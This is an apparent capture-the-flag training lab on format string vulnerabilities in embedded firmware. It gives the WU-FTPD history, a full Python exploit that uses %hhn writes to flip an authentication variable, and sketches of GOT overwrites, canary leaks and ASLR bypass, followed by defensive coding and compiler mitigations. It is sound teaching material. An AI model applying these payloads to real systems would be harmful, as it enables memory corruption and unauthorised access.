Lab 02: Format String Vulnerability¶

Introduction¶

Format string vulnerabilities represent a unique class of memory corruption bugs that shocked the security community when discovered in 2000. Unlike buffer overflows that require sequential memory corruption, format strings provide surgical precision for reading and writing arbitrary memory.

Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)

Learning Objectives¶

By completing this lab, you will:

Understand how printf format strings work internally
Master format string exploitation techniques
Learn to read and write arbitrary memory
Develop precision memory corruption skills
Appreciate secure coding practices for output functions

Historical Background¶

The WU-FTPD Discovery (2000)¶

In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers. The bug was deceptively simple:

// Vulnerable WU-FTPD code
sprintf(buf, user_controlled_string);

This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:

Linux rpc.statd (Ramen worm, 2001)
Various telnetd implementations
Logging daemons across platforms
Embedded device interfaces

Why Format Strings Shocked Security Researchers¶

Ubiquitous: Printf-family functions everywhere
Powerful: Read/write memory without overflow
Subtle: Easy to introduce, hard to spot
Precise: Byte-level memory manipulation

Vulnerability Overview¶

How Printf Works¶

Printf processes format specifiers to display variables:

int value = 42;
printf("Value: %d at %p\n", value, &value);

Format specifiers tell printf how to interpret arguments:

%d - Integer from next argument
%x - Hexadecimal from next argument
%s - String from pointer in next argument
%n - Write bytes printed to address in next argument

The Vulnerability¶

When user controls the format string:

void log_activity(char *user_input) {
    printf(user_input);  // VULNERABLE!
}

They control how printf interprets the stack:

%x - Read stack values
%s - Read from arbitrary addresses
%n - Write to arbitrary addresses

Lab Setup¶

Prerequisites¶

Completed Lab 01 (Buffer Overflow)
Understanding of printf internals
Python 3 with pwntools recommended

Getting Started¶

Build and flash the vulnerable binary:

cd /labs/02-format-string
make
make flash

Connect to the target:
```
screen /dev/ttyACM0 115200
```

Explore the application:

=================================
    Activity Logger v2.1
    Enhanced Security Edition
=================================

1. Log activity
2. Check authentication
3. Show hints
4. Reset

Understanding the Target¶

Application Overview¶

The system is an "activity logger" with:

Logging Function: Vulnerable printf call
Authentication Check: Requires specific value in memory
Debug Hints: Shows important addresses
Stack Canary: Monitors for corruption

The Vulnerable Code¶

void log_activity(char *user_input)
{
    embsec_printf("Activity logged: ");
    embsec_printf(user_input);  // FORMAT STRING BUG!
    embsec_printf("\n");
}

The Goal¶

Set the authenticated variable to 0x41414141 to get the flag.

Vulnerability Analysis¶

Step 1: Confirm the Vulnerability¶

Test with format specifiers:

Enter activity to log: %x %x %x %x
Activity logged: 20000800 deadbeef 64 20000810

Success! We're reading stack values.

Step 2: Information Gathering¶

Use option 3 for hints:

=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141

Critical information:

Target address: 0x20000C00
Required value: 0x41414141
Stack canary present (but irrelevant for format strings)

Step 3: Find Input Position¶

Locate our input on the stack:

Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141

Our input "AAAA" (0x41414141) is at position 6!

Step 4: Direct Parameter Access¶

Verify using direct parameter access:

Enter activity to log: AAAA%6$x
Activity logged: AAAA41414141

Perfect! We can reference our input directly.

Format String Techniques¶

1. Memory Reading¶

Reading Stack Values:

%x %x %x %x        # Read 4 stack values
%6$x               # Read 6th parameter directly
%100x              # Read with width (padding)

Reading Arbitrary Memory:

# Place address on stack, use %s to dereference
addr = 0x20000100
payload = struct.pack('<I', addr)
payload += b'%6$s'  # Read string from addr

2. Memory Writing¶

The %n Specifier:

Writes number of bytes printed so far
Takes address from stack parameter
Variants: %n (4 bytes), %hn (2 bytes), %hhn (1 byte)

Basic Write:

# Write value 100 to address
payload = struct.pack('<I', target_addr)
payload += b'%96x'   # Print 96 more chars (total 100)
payload += b'%6$n'   # Write 100 to target_addr

3. Precision Writing¶

For exact values, use width specifiers:

# Write 0x41 to single byte
payload = struct.pack('<I', target)
# Already printed 4 bytes (address)
payload += b'%61c'   # Print 61 chars (total 65 = 0x41)
payload += b'%6$hhn' # Write single byte

Exploitation¶

Understanding the Target Value¶

We need to write 0x41414141:

4 bytes, each containing 0x41
Decimal value: 65 ('A' in ASCII)

Exploitation Strategy¶

Write each byte separately using %hhn:

Place 4 addresses on stack (target+0, +1, +2, +3)
Use width specifiers to control bytes printed
Write 0x41 to each address sequentially

Building the Exploit¶

#!/usr/bin/env python3
import struct
import serial
import time

# Target configuration
target_addr = 0x20000C00
target_value = 0x41414141

# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)

def send_command(cmd):
    ser.write(cmd.encode() + b'\n')
    time.sleep(0.1)

# Navigate to log activity
send_command('1')

# Build format string payload
payload = b''

# Place 4 addresses on stack
for i in range(4):
    payload += struct.pack('<I', target_addr + i)

# We've printed 16 bytes (4 addresses * 4 bytes each)
# Need to print 65 total for 0x41

# First byte: need 65 - 16 = 49 more
payload += b'%49c%6$hhn'

# Subsequent bytes: already at 65, just write
payload += b'%7$hhn'
payload += b'%8$hhn'
payload += b'%9$hhn'

# Send exploit
ser.write(payload + b'\n')

# Check authentication
time.sleep(0.5)
send_command('2')

# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))

Manual Exploitation Steps¶

Calculate addresses:

for i in range(4):
    print(f"Address {i}: 0x{0x20000C00 + i:08x}")

Build payload:

import struct
p = b''
p += struct.pack('<I', 0x20000C00)
p += struct.pack('<I', 0x20000C01)
p += struct.pack('<I', 0x20000C02)
p += struct.pack('<I', 0x20000C03)
p += b'%49c%6$hhn%7$hhn%8$hhn%9$hhn'
print(repr(p))

Execute:
Select option 1
Paste payload
Select option 2
Get flag!

Expected Result¶

Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!

Advanced Techniques¶

1. Large Value Writes¶

Writing large values efficiently:

# Write 0xdeadbeef
# Split into: 0xde, 0xad, 0xbe, 0xef
# Order by value: 0xad, 0xbe, 0xde, 0xef

values = [(0xad, 1), (0xbe, 2), (0xde, 0), (0xef, 3)]
values.sort()

payload = b''
# Place addresses
for _, offset in values:
    payload += struct.pack('<I', target + offset)

printed = 16
for value, offset in values:
    needed = value - printed
    if needed > 0:
        payload += f'%{needed}c'.encode()
    payload += f'%{6+offset}$hhn'.encode()
    printed = value

2. GOT Overwrite¶

Overwrite Global Offset Table entries:

# Find GOT entry
got_printf = 0x20001234

# Overwrite with shellcode address
shellcode_addr = 0x20000500

# Use format string to overwrite GOT

3. Stack Pivot¶

Use format string to modify stack pointer:

# Write to saved stack pointer
# Pivot to controlled memory
# Execute ROP chain

4. Information Disclosure¶

Leak critical addresses:

# Leak stack canary
payload = b'%39$x'  # Canary often at fixed offset

# Leak return addresses
payload = b'%40$x'  # Find saved EIP/LR

# Leak library addresses (bypass ASLR)
payload = struct.pack('<I', got_entry)
payload += b'%6$s'  # Dereference GOT

Defensive Measures¶

Immediate Fixes¶

Never Use User Input as Format String:

// Vulnerable
printf(user_input);
snprintf(buf, size, user_input);
syslog(LOG_INFO, user_input);

// Secure
printf("%s", user_input);
snprintf(buf, size, "%s", user_input);
syslog(LOG_INFO, "%s", user_input);

Use Format String Literals:

// Use string literals when possible
#define LOG_FORMAT "[%s] User: %s, Action: %s\n"
printf(LOG_FORMAT, timestamp, user, action);

Compiler Protections¶

Enable format string warnings:

CFLAGS += -Wformat=2
CFLAGS += -Wformat-security
CFLAGS += -Werror=format-security

Runtime Protections¶

FORTIFY_SOURCE:
```
CFLAGS += -D_FORTIFY_SOURCE=2
```
Stack Canaries (limited effectiveness against format strings)
RELRO (Relocation Read-Only):
```
LDFLAGS += -Wl,-z,relro,-z,now
```

Common Pitfalls¶

1. Parameter Counting¶

Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position

2. Alignment Issues¶

Problem: Addresses must be word-aligned on ARM
Solution: Ensure target addresses are 4-byte aligned

3. Width Calculation¶

Problem: Incorrect byte counts for %n
Solution: Track bytes printed carefully, including addresses

4. Format String Limits¶

Problem: Some implementations limit width specifiers
Solution: Use multiple writes or find alternatives

Real-World Impact¶

Format string bugs in the wild:

Historical Exploits¶

2000: WU-FTPD 2.6.0 remote root
2001: Linux rpc.statd (Ramen worm)
2002: OpenBSD ftpd
2003: Linux kernel vsprintf

Modern Occurrences¶

2021: sudo format string in logging
2020: Windows Print Spooler
IoT Devices: Common in embedded systems
Web Applications: Printf-style template engines

Comparison with Buffer Overflows¶

Aspect	Buffer Overflow	Format String
Discovery	Obvious pattern	Subtle mistake
Precision	Sequential corruption	Surgical writes
Read Capability	Limited	Extensive
Write Capability	Sequential	Arbitrary
Bypass Protections	Harder	Often easier
Complexity	Lower	Higher

Key Takeaways¶

Format String Power: Read/write anywhere without overflow
Always Use %s: Never pass user input as format string
Compiler Warnings: Enable and heed format warnings
Defense in Depth: Multiple protections needed
Code Review: Look for printf-family vulnerabilities

Challenges¶

No debug output - can you still exploit?

Use %x to map memory
Find addresses through leaks
Brute force if necessary

Challenge 2: Limited Input Length¶

Only 32 bytes allowed:

Use short writes (%hn)
Multiple exploitation rounds
Leverage existing values

Challenge 3: ASLR Enabled¶

Randomized addresses:

Leak base addresses first
Use relative offsets
Partial overwrites

Next Steps¶

Congratulations on mastering format string exploitation! You've learned:

How printf processes format specifiers
Reading arbitrary memory with %x and %s
Writing arbitrary memory with %n
Precision memory corruption techniques
Why format string bugs are dangerous

Consider exploring:

Advanced ROP techniques
Heap exploitation methods
Integer overflow vulnerabilities
Race conditions in embedded systems

"With great power comes great responsibility" - Always use format strings safely!